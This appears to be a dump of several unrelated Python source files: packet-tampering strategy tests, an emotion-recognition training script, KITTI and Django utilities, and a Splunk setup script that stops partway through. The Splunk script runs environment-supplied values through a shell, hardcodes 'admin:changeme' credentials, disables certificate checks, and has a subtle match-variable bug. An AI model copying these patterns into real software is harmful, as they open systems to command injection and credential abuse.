duplicate.left = tamper
duplicate.right = tamper2
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
print("ABUT TO RUN")
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
print(str(a))
print(str(packets[0]))
print(str(packets[1]))
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "R"
print(str(a))
tamper.left = duplicate2
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 3
assert None not in packets
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "S"
assert packets[2][TCP].flags == "R"
print(str(a))
tamper2.left = drop
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
assert packets[0][TCP].flags == "S"
assert packets[1][TCP].flags == "S"
print(str(a))
assert a.remove_action(duplicate2)
tamper.left = actions.drop.DropAction()
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logger )
assert len(packets) == 0
print(str(a))
a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S},))-|", logger)
packet = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(packet, logger)
packets = a.run(packet, logger)
assert len(packets) == 3
assert packets[0][TCP].flags == "R"
assert packets[1][TCP].flags == "S"
assert packets[2][TCP].flags == "A"
def test_index():
"""
Tests index
"""
a = actions.tree.ActionTree("out")
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="F")
assert a.add_action(tamper)
assert a[0] == tamper
assert not a[1]
assert a.add_action(tamper2)
assert a[0] == tamper
assert a[1] == tamper2
assert a[-1] == tamper2
assert not a[10]
assert a.add_action(tamper3)
assert a[-1] == tamper3
assert not a[-11]
def test_mate():
"""
Tests mate primitive
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert not a.choose_one()
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
other_a = actions.tree.ActionTree("out", trigger=t)
assert not a.mate(other_a), "Can't mate empty trees"
assert a.add_action(tamper)
assert other_a.add_action(tamper2)
assert a.choose_one() == tamper
assert other_a.choose_one() == tamper2
assert a.get_parent(tamper) == (None, None)
assert other_a.get_parent(tamper2) == (None, None)
assert a.add_action(duplicate)
assert a.get_parent(duplicate) == (tamper, "left")
duplicate.right = drop
assert a.get_parent(drop) == (duplicate, "right")
assert other_a.add_action(duplicate2)
# Test mating a full tree with a full tree
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|"
assert str(other_a) == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate,)-|"
assert a.swap(duplicate, other_a, duplicate2)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
assert str(other_a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:R}(duplicate(,drop),)-|"
assert len(a) == 2
assert len(other_a) == 3
assert duplicate2 not in other_a
assert duplicate not in a
assert tamper.left == duplicate2
assert tamper2.left == duplicate
assert other_a.get_parent(duplicate) == (tamper2, "left")
assert a.get_parent(duplicate2) == (tamper, "left")
assert other_a.get_parent(drop) == (duplicate, "right")
assert a.get_parent(None) == (None, None)
# Test mating two trees with just root nodes
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert not a.choose_one()
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
other_a = actions.tree.ActionTree("out", trigger=t)
assert not a.mate(other_a)
assert a.add_action(duplicate)
assert other_a.add_action(duplicate2)
assert a.mate(other_a)
assert a.action_root == duplicate2
assert other_a.action_root == duplicate
assert not duplicate.left and not duplicate.right
assert not duplicate2.left and not duplicate2.right
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
assert not node.left == other_node
assert not node.right == other_node
# Test mating two trees where one is empty
assert a.remove_action(duplicate2)
# This should swap the duplicate action to be the action root of the other tree
assert str(a) == "[TCP:flags:0]-|"
assert str(other_a) == "[TCP:flags:0]-duplicate-|"
assert a.mate(other_a)
assert not other_a.action_root
assert a.action_root == duplicate
assert len(a) == 1
assert len(other_a) == 0
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
if other_node:
assert not node.left == other_node
assert not node.right == other_node
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate(,drop),)-|", logger)
drop = a.action_root.left.right
assert str(drop) == "drop"
# Note that this will return a valid ActionTree, but because it is empty,
# it is technically a False-y value, as it's length is 0
assert other_a.parse("[TCP:flags:0]-|", logger) == other_a
a.swap(drop, other_a, None)
assert other_a.action_root == drop
assert not a.action_root.left.right
assert str(other_a) == "[TCP:flags:0]-drop-|"
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(duplicate,)-|"
other_a.swap(drop, a, a.action_root.left)
# Confirm that no nodes have been aliased or connected between the trees
for node in a:
for other_node in other_a:
if other_node:
assert not node.left == other_node
assert not node.right == other_node
assert str(other_a) == "[TCP:flags:0]-duplicate-|"
assert str(a) == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,)-|"
a.parse("[TCP:flags:0]-drop-|", logger)
other_a.parse("[TCP:flags:0]-duplicate(drop,drop)-|", logger)
a_drop = a.action_root
other_duplicate = other_a.action_root
a.swap(a_drop, other_a, other_duplicate)
print(str(a))
print(str(other_a))
assert str(other_a) == "[TCP:flags:0]-drop-|"
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
drop2 = actions.drop.DropAction()
drop3 = actions.drop.DropAction()
a = actions.tree.ActionTree("out", trigger=t)
a.add_action(duplicate)
a.add_action(drop)
a.add_action(drop2)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
assert a.get_slots() == 0
other_a = actions.tree.ActionTree("out", trigger=t)
other_a.add_action(drop3)
a.swap(drop, other_a, drop3)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
a.swap(drop3, other_a, drop)
assert str(a) == "[TCP:flags:0]-duplicate(drop,drop)-|"
assert a.mate(other_a)
def test_choose_one():
"""
Tests choose_one functionality
"""
a = actions.tree.ActionTree("out")
drop = actions.drop.DropAction()
assert not a.choose_one()
assert a.add_action(drop)
assert a.choose_one() == drop
assert a.remove_action(drop)
assert not a.choose_one()
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
assert a.choose_one() == duplicate
duplicate.left = drop
assert a.choose_one() in [duplicate, drop]
# Make sure that both actions get chosen
chosen = set()
for i in range(0, 10000):
act = a.choose_one()
chosen.add(act)
assert chosen == set([duplicate, drop])
|
39611
|
import os
import glob
from tqdm import tqdm
import argparse
from PIL import Image
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.utils.data as data
from torchvision import transforms, datasets
from networks.dan import DAN
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--aff_path', type=str, default='datasets/AfectNet/', help='AfectNet dataset path.')
parser.add_argument('--batch_size', type=int, default=256, help='Batch size.')
parser.add_argument('--lr', type=float, default=0.0001, help='Initial learning rate for adam.')
parser.add_argument('--workers', default=8, type=int, help='Number of data loading workers.')
parser.add_argument('--epochs', type=int, default=40, help='Total training epochs.')
parser.add_argument('--num_head', type=int, default=4, help='Number of attention head.')
parser.add_argument('--num_class', type=int, default=8, help='Number of class.')
return parser.parse_args()
class AffectNet(data.Dataset):
def __init__(self, aff_path, phase, use_cache = True, transform = None):
self.phase = phase
self.transform = transform
self.aff_path = aff_path
if use_cache:
cache_path = os.path.join(aff_path,'affectnet.csv')
if os.path.exists(cache_path):
df = pd.read_csv(cache_path)
else:
df = self.get_df()
df.to_csv(cache_path)
else:
df = self.get_df()
self.data = df[df['phase'] == phase]
self.file_paths = self.data.loc[:, 'img_path'].values
self.label = self.data.loc[:, 'label'].values
_, self.sample_counts = np.unique(self.label, return_counts=True)
# print(f' distribution of {phase} samples: {self.sample_counts}')
def get_df(self):
train_path = os.path.join(self.aff_path,'train_set/')
val_path = os.path.join(self.aff_path,'val_set/')
data = []
for anno in glob.glob(train_path + 'annotations/*_exp.npy'):
idx = os.path.basename(anno).split('_')[0]
img_path = os.path.join(train_path,f'images/{idx}.jpg')
label = int(np.load(anno))
data.append(['train',img_path,label])
for anno in glob.glob(val_path + 'annotations/*_exp.npy'):
idx = os.path.basename(anno).split('_')[0]
img_path = os.path.join(val_path,f'images/{idx}.jpg')
label = int(np.load(anno))
data.append(['val',img_path,label])
return pd.DataFrame(data = data,columns = ['phase','img_path','label'])
def __len__(self):
return len(self.file_paths)
def __getitem__(self, idx):
path = self.file_paths[idx]
image = Image.open(path).convert('RGB')
label = self.label[idx]
if self.transform is not None:
image = self.transform(image)
return image, label
class AffinityLoss(nn.Module):
def __init__(self, device, num_class=8, feat_dim=512):
super(AffinityLoss, self).__init__()
self.num_class = num_class
self.feat_dim = feat_dim
self.gap = nn.AdaptiveAvgPool2d(1)
self.device = device
self.centers = nn.Parameter(torch.randn(self.num_class, self.feat_dim).to(device))
def forward(self, x, labels):
x = self.gap(x).view(x.size(0), -1)
batch_size = x.size(0)
distmat = torch.pow(x, 2).sum(dim=1, keepdim=True).expand(batch_size, self.num_class) + \
torch.pow(self.centers, 2).sum(dim=1, keepdim=True).expand(self.num_class, batch_size).t()
distmat.addmm_(x, self.centers.t(), beta=1, alpha=-2)
classes = torch.arange(self.num_class).long().to(self.device)
labels = labels.unsqueeze(1).expand(batch_size, self.num_class)
mask = labels.eq(classes.expand(batch_size, self.num_class))
dist = distmat * mask.float()
dist = dist / self.centers.var(dim=0).sum()
loss = dist.clamp(min=1e-12, max=1e+12).sum() / batch_size
return loss
class PartitionLoss(nn.Module):
def __init__(self, ):
super(PartitionLoss, self).__init__()
def forward(self, x):
num_head = x.size(1)
if num_head > 1:
var = x.var(dim=1).mean()
loss = torch.log(1+num_head/var)
else:
loss = 0
return loss
class ImbalancedDatasetSampler(data.sampler.Sampler):
def __init__(self, dataset, indices: list = None, num_samples: int = None):
self.indices = list(range(len(dataset))) if indices is None else indices
self.num_samples = len(self.indices) if num_samples is None else num_samples
df = pd.DataFrame()
df["label"] = self._get_labels(dataset)
df.index = self.indices
df = df.sort_index()
label_to_count = df["label"].value_counts()
weights = 1.0 / label_to_count[df["label"]]
self.weights = torch.DoubleTensor(weights.to_list())
# self.weights = self.weights.clamp(min=1e-5)
def _get_labels(self, dataset):
if isinstance(dataset, datasets.ImageFolder):
return [x[1] for x in dataset.imgs]
elif isinstance(dataset, torch.utils.data.Subset):
return [dataset.dataset.imgs[i][1] for i in dataset.indices]
else:
raise NotImplementedError
def __iter__(self):
return (self.indices[i] for i in torch.multinomial(self.weights, self.num_samples, replacement=True))
def __len__(self):
return self.num_samples
def run_training():
args = parse_args()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.is_available():
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.enabled = True
model = DAN(num_class=args.num_class, num_head=args.num_head)
model.to(device)
data_transforms = transforms.Compose([
transforms.Resize((224, 224)),
transforms.RandomHorizontalFlip(),
transforms.RandomApply([
transforms.RandomAffine(20, scale=(0.8, 1), translate=(0.2, 0.2)),
], p=0.7),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
transforms.RandomErasing(),
])
# train_dataset = AffectNet(args.aff_path, phase = 'train', transform = data_transforms) # loading dynamically
train_dataset = datasets.ImageFolder(f'{args.aff_path}/train', transform = data_transforms) # loading statically
if args.num_class == 7: # ignore the 8-th class
idx = [i for i in range(len(train_dataset)) if train_dataset.imgs[i][1] != 7]
train_dataset = data.Subset(train_dataset, idx)
print('Whole train set size:', train_dataset.__len__())
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size = args.batch_size,
num_workers = args.workers,
sampler=ImbalancedDatasetSampler(train_dataset),
shuffle = False,
pin_memory = True)
data_transforms_val = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
# val_dataset = AffectNet(args.aff_path, phase = 'val', transform = data_transforms_val) # loading dynamically
val_dataset = datasets.ImageFolder(f'{args.aff_path}/val', transform = data_transforms_val) # loading statically
if args.num_class == 7: # ignore the 8-th class
idx = [i for i in range(len(val_dataset)) if val_dataset.imgs[i][1] != 7]
val_dataset = data.Subset(val_dataset, idx)
print('Validation set size:', val_dataset.__len__())
val_loader = torch.utils.data.DataLoader(val_dataset,
batch_size = args.batch_size,
num_workers = args.workers,
shuffle = False,
pin_memory = True)
criterion_cls = torch.nn.CrossEntropyLoss().to(device)
criterion_af = AffinityLoss(device, num_class=args.num_class)
criterion_pt = PartitionLoss()
params = list(model.parameters()) + list(criterion_af.parameters())
optimizer = torch.optim.Adam(params,args.lr,weight_decay = 0)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma = 0.6)
best_acc = 0
for epoch in tqdm(range(1, args.epochs + 1)):
running_loss = 0.0
correct_sum = 0
iter_cnt = 0
model.train()
for (imgs, targets) in train_loader:
iter_cnt += 1
optimizer.zero_grad()
imgs = imgs.to(device)
targets = targets.to(device)
out,feat,heads = model(imgs)
loss = criterion_cls(out,targets) + criterion_af(feat,targets) + criterion_pt(heads)
loss.backward()
optimizer.step()
running_loss += loss
_, predicts = torch.max(out, 1)
correct_num = torch.eq(predicts, targets).sum()
correct_sum += correct_num
acc = correct_sum.float() / float(train_dataset.__len__())
running_loss = running_loss/iter_cnt
tqdm.write('[Epoch %d] Training accuracy: %.4f. Loss: %.3f. LR %.6f' % (epoch, acc, running_loss,optimizer.param_groups[0]['lr']))
with torch.no_grad():
running_loss = 0.0
iter_cnt = 0
bingo_cnt = 0
sample_cnt = 0
model.eval()
for imgs, targets in val_loader:
imgs = imgs.to(device)
targets = targets.to(device)
out,feat,heads = model(imgs)
loss = criterion_cls(out,targets) + criterion_af(feat,targets) + criterion_pt(heads)
running_loss += loss
iter_cnt+=1
_, predicts = torch.max(out, 1)
correct_num = torch.eq(predicts,targets)
bingo_cnt += correct_num.sum().cpu()
sample_cnt += out.size(0)
running_loss = running_loss/iter_cnt
scheduler.step()
acc = bingo_cnt.float()/float(sample_cnt)
acc = np.around(acc.numpy(),4)
best_acc = max(acc,best_acc)
tqdm.write("[Epoch %d] Validation accuracy:%.4f. Loss:%.3f" % (epoch, acc, running_loss))
tqdm.write("best_acc:" + str(best_acc))
if args.num_class == 7 and acc > 0.65:
torch.save({'iter': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),},
os.path.join('checkpoints', "affecnet7_epoch"+str(epoch)+"_acc"+str(acc)+".pth"))
tqdm.write('Model saved.')
elif args.num_class == 8 and acc > 0.62:
torch.save({'iter': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),},
os.path.join('checkpoints', "affecnet8_epoch"+str(epoch)+"_acc"+str(acc)+".pth"))
tqdm.write('Model saved.')
if __name__ == "__main__":
run_training()
|
39641
|
import codecs
from solthiruthi.dictionary import *
from tamil import wordutils
TVU, TVU_size = DictionaryBuilder.create(TamilVU)
ag, ag2 = wordutils.anagrams_in_dictionary(TVU)
with codecs.open("demo.txt", "w", "utf-8") as fp:
itr = 1
for k, c in ag:
v = ag2[k]
fp.write("%03d) %s\n" % (itr, " | ".join(v)))
itr += 1
|
39647
|
from __future__ import division
import numpy as np
from path import Path
from imageio import imread
from skimage.transform import resize as imresize
from kitti_util import pose_from_oxts_packet, generate_depth_map, read_calib_file, transform_from_rot_trans
from datetime import datetime
class KittiRawLoader(object):
def __init__(self,
dataset_dir,
static_frames_file=None,
img_height=128,
img_width=416,
min_disp=0.2,
get_depth=False,
get_pose=False,
depth_size_ratio=1):
dir_path = Path(__file__).realpath().dirname()
test_scene_file = dir_path/'test_scenes.txt'
self.from_speed = static_frames_file is None
if static_frames_file is not None:
self.collect_static_frames(static_frames_file)
with open(test_scene_file, 'r') as f:
test_scenes = f.readlines()
self.test_scenes = [t[:-1] for t in test_scenes]
self.dataset_dir = dataset_dir
self.img_height = img_height
self.img_width = img_width
self.cam_ids = ['02', '03']
self.date_list = ['2011_09_26', '2011_09_28', '2011_09_29', '2011_09_30', '2011_10_03']
self.min_disp = min_disp
self.get_depth = get_depth
self.get_pose = get_pose
self.depth_size_ratio = depth_size_ratio
self.collect_train_folders()
def collect_static_frames(self, static_frames_file):
with open(static_frames_file, 'r') as f:
frames = f.readlines()
self.static_frames = {}
for fr in frames:
if fr == '\n':
continue
date, drive, frame_id = fr.split(' ')
curr_fid = '%.10d' % (np.int(frame_id[:-1]))
if drive not in self.static_frames.keys():
self.static_frames[drive] = []
self.static_frames[drive].append(curr_fid)
def collect_train_folders(self):
self.scenes = []
for date in self.date_list:
drive_set = (self.dataset_dir/date).dirs()
for dr in drive_set:
if dr.name[:-5] not in self.test_scenes:
self.scenes.append(dr)
def collect_scenes(self, drive):
train_scenes = []
for c in self.cam_ids:
oxts = sorted((drive/'oxts'/'data').files('*.txt'))
with open(drive/'oxts'/'timestamps.txt', 'r') as f:
times = [datetime.strptime(time_string[:-4], "%Y-%m-%d %H:%M:%S.%f") for time_string in f.readlines()]
scene_data = {'cid': c,
'dir': drive,
'speed': [],
'time': [t.timestamp() for t in times],
'frame_id': [],
'pose': [],
'rel_path': drive.name + '_' + c}
scale = None
origin = None
imu2velo = read_calib_file(drive.parent/'calib_imu_to_velo.txt')
velo2cam = read_calib_file(drive.parent/'calib_velo_to_cam.txt')
cam2cam = read_calib_file(drive.parent/'calib_cam_to_cam.txt')
velo2cam_mat = transform_from_rot_trans(velo2cam['R'], velo2cam['T'])
imu2velo_mat = transform_from_rot_trans(imu2velo['R'], imu2velo['T'])
cam_2rect_mat = transform_from_rot_trans(cam2cam['R_rect_00'], np.zeros(3))
imu2cam = cam_2rect_mat @ velo2cam_mat @ imu2velo_mat
for n, f in enumerate(oxts):
metadata = np.genfromtxt(f)
speed = metadata[8:11]
scene_data['speed'].append(speed)
scene_data['frame_id'].append('{:010d}'.format(n))
lat = metadata[0]
if scale is None:
scale = np.cos(lat * np.pi / 180.)
pose_matrix = pose_from_oxts_packet(metadata[:6], scale)
if origin is None:
origin = pose_matrix
odo_pose = imu2cam @ np.linalg.inv(origin) @ pose_matrix @ np.linalg.inv(imu2cam)
scene_data['pose'].append(odo_pose[:3])
sample = self.load_image(scene_data, 0)
if sample is None:
return []
scene_data['P_rect'] = self.get_P_rect(scene_data, sample[1], sample[2])
scene_data['intrinsics'] = scene_data['P_rect'][:, :3]
train_scenes.append(scene_data)
return train_scenes
def get_scene_imgs(self, scene_data):
def construct_sample(scene_data, i, frame_id):
sample = {"img": self.load_image(scene_data, i)[0], "id": frame_id}
if self.get_depth:
sample['depth'] = self.get_depth_map(scene_data, i)
if self.get_pose:
sample['pose'] = scene_data['pose'][i]
return sample
if self.from_speed:
cum_displacement = np.zeros(3)
for i, (speed1, speed2, t1, t2) in enumerate(zip(scene_data['speed'][1:],
scene_data['speed'][:-1],
scene_data['time'][1:],
scene_data['time'][:-1])):
print(speed1, speed2, t1, t2)
cum_displacement += 0.5*(speed1 + speed2) / (t2-t1)
disp_mag = np.linalg.norm(cum_displacement)
if disp_mag > self.min_disp:
frame_id = scene_data['frame_id'][i]
yield construct_sample(scene_data, i, frame_id)
cum_displacement *= 0
else: # from static frame file
drive = str(scene_data['dir'].name)
for (i, frame_id) in enumerate(scene_data['frame_id']):
if (drive not in self.static_frames.keys()) or (frame_id not in self.static_frames[drive]):
yield construct_sample(scene_data, i, frame_id)
def get_P_rect(self, scene_data, zoom_x, zoom_y):
calib_file = scene_data['dir'].parent/'calib_cam_to_cam.txt'
filedata = read_calib_file(calib_file)
P_rect = np.reshape(filedata['P_rect_' + scene_data['cid']], (3, 4))
P_rect[0] *= zoom_x
P_rect[1] *= zoom_y
return P_rect
def load_image(self, scene_data, tgt_idx):
img_file = scene_data['dir']/'image_{}'.format(scene_data['cid'])/'data'/scene_data['frame_id'][tgt_idx]+'.png'
if not img_file.isfile():
return None
img = imread(img_file)
zoom_y = self.img_height/img.shape[0]
zoom_x = self.img_width/img.shape[1]
img = imresize(img, (self.img_height, self.img_width))
# workaround for skimage (float [0 .. 1]) and imageio (uint8 [0 .. 255]) interoperability
img = (img * 255).astype(np.uint8)
return img, zoom_x, zoom_y
def get_depth_map(self, scene_data, tgt_idx):
# compute projection matrix velodyne->image plane
R_cam2rect = np.eye(4)
calib_dir = scene_data['dir'].parent
cam2cam = read_calib_file(calib_dir/'calib_cam_to_cam.txt')
velo2cam = read_calib_file(calib_dir/'calib_velo_to_cam.txt')
velo2cam = np.hstack((velo2cam['R'].reshape(3, 3), velo2cam['T'][..., np.newaxis]))
velo2cam = np.vstack((velo2cam, np.array([0, 0, 0, 1.0])))
R_cam2rect[:3, :3] = cam2cam['R_rect_00'].reshape(3, 3)
velo2cam = np.dot(R_cam2rect, velo2cam)
velo_file_name = scene_data['dir']/'velodyne_points'/'data'/'{}.bin'.format(scene_data['frame_id'][tgt_idx])
return generate_depth_map(velo_file_name, scene_data['P_rect'], velo2cam,
self.img_width, self.img_height, self.depth_size_ratio)
|
39661
|
from django.db import models
class Publisher(models.Model):
name = models.CharField(max_length=100)
class Author(models.Model):
name = models.CharField(max_length=100)
class Book(models.Model):
name = models.CharField(max_length=100)
authors = models.ManyToManyField(Author, related_name='books')
publisher = models.ForeignKey(Publisher, related_name='books')
__test__ = {'one':"""
#
# RelatedManager
#
# First create a Publisher.
>>> p = Publisher.objects.create(name='Acme Publishing')
# Create a book through the publisher.
>>> book, created = p.books.get_or_create(name='The Book of Ed & Fred')
>>> created
True
# The publisher should have one book.
>>> p.books.count()
1
# Try get_or_create again, this time nothing should be created.
>>> book, created = p.books.get_or_create(name='The Book of Ed & Fred')
>>> created
False
# And the publisher should still have one book.
>>> p.books.count()
1
#
# ManyRelatedManager
#
# Add an author to the book.
>>> ed, created = book.authors.get_or_create(name='Ed')
>>> created
True
# Book should have one author.
>>> book.authors.count()
1
# Try get_or_create again, this time nothing should be created.
>>> ed, created = book.authors.get_or_create(name='Ed')
>>> created
False
# And the book should still have one author.
>>> book.authors.count()
1
# Add a second author to the book.
>>> fred, created = book.authors.get_or_create(name='Fred')
>>> created
True
# The book should have two authors now.
>>> book.authors.count()
2
# Create an Author not tied to any books.
>>> Author.objects.create(name='Ted')
<Author: Author object>
# There should be three Authors in total. The book object should have two.
>>> Author.objects.count()
3
>>> book.authors.count()
2
# Try creating a book through an author.
>>> ed.books.get_or_create(name="<NAME>", publisher=p)
(<Book: Book object>, True)
# Now Ed has two Books, Fred just one.
>>> ed.books.count()
2
>>> fred.books.count()
1
"""}
|
39733
|
from collections import OrderedDict
from rest_framework import serializers
from data_import.models import DataFile
from open_humans.models import User
from private_sharing.models import project_membership_visible
class PublicDataFileSerializer(serializers.ModelSerializer):
"""
Serialize a public data file.
"""
metadata = serializers.JSONField()
def to_representation(self, data):
ret = OrderedDict()
fields = self.get_fields()
query_params = dict(self.context.get("request").query_params)
source = getattr(data, "source")
user_t = getattr(data, "user")
usernames = []
if "username" in query_params:
usernames = query_params["username"]
visible = project_membership_visible(user_t.member, source)
if (user_t.username in usernames) and not visible:
return ret
request = self.context.get("request", None)
for field in fields:
item = getattr(data, str(field))
if isinstance(item, User):
if visible:
member = getattr(user_t, "member")
user = {
"id": getattr(member, "member_id"),
"name": getattr(member, "name"),
"username": getattr(item, "username"),
}
else:
user = {"id": None, "name": None, "username": None}
ret["user"] = user
elif field == "download_url":
ret["download_url"] = item(request)
else:
ret[str(field)] = getattr(data, field)
return ret
class Meta: # noqa: D101
model = DataFile
fields = (
"id",
"basename",
"created",
"download_url",
"metadata",
"source",
"user",
)
|
39737
|
import os
import sys
import json
import time
import socket
import re
import glob
import subprocess
import requests
import splunk.clilib.cli_common
import splunk.util
var_expandvars_re = re.compile(r'\AENV\((.*)\)$')
var_shell_re = re.compile(r'\ASHELL\((.*)\)$')
def main():
"""
Initialize node. Can run before splunk started and after splunk started
"""
if sys.argv[1] == "--configure":
configure()
elif sys.argv[1] == "--wait-splunk":
wait_splunk(sys.argv[2], sys.argv[3:])
elif sys.argv[1] == "--add-licenses":
add_licenses(sys.argv[2])
elif sys.argv[1] == "--shc-autobootstrap":
shc_autobootstrap(int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7], sys.argv[8])
else:
exit(1)
def configure():
"""
using CONF__ notation you can define any configuration, examples
CONF__[{location_under_splunk_home}__]{conf_file}__{stanza}__{key}=value
If location_under_splunk_home is not specified - system is used.
"""
# Allow to set any configurations with this
conf_updates = {}
for env, val in os.environ.iteritems():
if env.startswith("CONF__"):
parts = env.split("__")[1:]
conf_file_name = None
parent = None
conf_folder = "system"
if len(parts) == 4:
conf_folder = parts[0]
parts = parts[1:]
conf_folder_full = __get_conf_folder_full(conf_folder, parent)
file_name = parts[0]
if file_name == "meta":
file_name = "local.meta"
subfolder = "metadata"
else:
file_name = file_name + ".conf"
subfolder = "local"
conf_file = os.path.join(conf_folder_full, subfolder, file_name)
conf_updates.setdefault(conf_file, {}).setdefault(parts[1], {})[parts[2]] = __get_value(val)
for conf_file, conf_update in conf_updates.iteritems():
conf = splunk.clilib.cli_common.readConfFile(conf_file) if os.path.exists(conf_file) else {}
for stanza, values in conf_update.iteritems():
dest_stanza = conf.setdefault(stanza, {})
dest_stanza.update(values)
if "default" in conf and not conf["default"]:
del conf["default"]
folder = os.path.dirname(conf_file)
if not os.path.isdir(folder):
os.makedirs(folder)
splunk.clilib.cli_common.writeConfFile(conf_file, conf)
def __get_value(val):
var_expand_match = var_expandvars_re.match(val)
if var_expand_match:
return os.path.expandvars(var_expand_match.groups()[0])
var_shell_match = var_shell_re.match(val)
if var_shell_match:
return subprocess.check_output(var_expand_match.groups()[0], shell=True)
return val
def __get_conf_folder_full(conf_folder, parent):
if conf_folder == "system":
return os.path.join(os.environ["SPLUNK_HOME"], "etc", conf_folder)
else:
return os.path.join(os.environ["SPLUNK_HOME"], conf_folder)
def wait_splunk(uri, roles):
"""
Wait 5 minutes for dependency
"""
for x in xrange(1, 300):
try:
# This url does not require authentication, ignore certificate
response = requests.get(uri + "/services/server/info?output_mode=json", verify=False)
if response.status_code == 200:
server_roles = response.json()["entry"][0]["content"]["server_roles"]
if not roles or all(any(re.match(role, server_role) for server_role in server_roles) for role in roles):
return
else:
print "Waiting for " + ", ".join(roles) + " in " + uri + " got " + ", ".join(server_roles) + "."
else:
print "Waiting for "+ ", ".join(roles) + " in " + uri + "."
except requests.exceptions.RequestException as exception:
print "Waiting for " + ", ".join(roles) + " in " + uri + ". Exception: " + str(exception)
time.sleep(1)
print "Failed to connect to " + uri + " and check server roles " + ", ".join(roles)
exit(1)
def add_licenses(folder):
while True:
if os.path.isdir(folder):
licenses = glob.glob(os.path.join(folder, "*.lic"))
if licenses:
# Adding all licenses one by one and break
for license in licenses:
args = [
"add",
"licenses",
"-auth", "admin:changeme",
license
]
__splunk_execute(args)
break
print "Waiting for license files under " + folder
time.sleep(1)
def shc_autobootstrap(autobootstrap, mgmt_uri, local_user, local_password, service_discovery_uri, service_discovery_user, service_discovery_password):
"""
Write current uri to the service discovery URL, if current member has index equal
to INIT_SHCLUSTER_AUTOBOOTSTRAP - bootstrap SHC, if more - add itself to existing SHC
"""
__service_discovery_post(service_discovery_uri, service_discovery_user, service_discovery_password, data=json.dumps({"host": mgmt_uri}), headers={"Content-type": "application/json"})
all_members = __service_discovery_get(service_discovery_uri, service_discovery_user, service_discovery_password, params={"sort": "_key"}).json()
for index, member in enumerate(all_members):
if member["host"] == mgmt_uri:
if (index + 1) == autobootstrap:
__splunk_execute([
"bootstrap",
"shcluster-captain",
"-auth", "%s:%s" % (local_user, local_password),
"-servers_list", ",".join(m["host"] for m in all_members[:autobootstrap])
])
elif (index + 1) > autobootstrap:
# We do not check if current list of members already bootstrapped, assuming that autobootstrap is always equal to
# how many instances user creating at beginning
__splunk_execute([
"add",
"shcluster-member",
"-auth", "%s:%s" % (local_user, local_password),
"-current_member_uri", next(m["host"] for m in all_members[:autobootstrap])
])
def __service_discovery_get(service_discovery_uri, service_discovery_user, service_discovery_password, **kwargs):
for x in xrange(1, 300):
try:
response = requests.get(service_discovery_uri,
verify=False,
auth=(service_discovery_user, service_discovery_password),
**kwargs)
response.raise_for_status()
return response
except requests.exceptions.RequestException as ex:
print "Failed to make GET request to service discovery url. " + str(ex)
sys.stdout.flush()
sys.stderr.flush()
time.sleep(1)
print "FAILED. Could not make GET request to service discovery url."
exit(1)
def __service_discovery_post(service_discovery_uri, service_discovery_user, service_discovery_password, **kwargs):
for x in xrange(1, 300):
try:
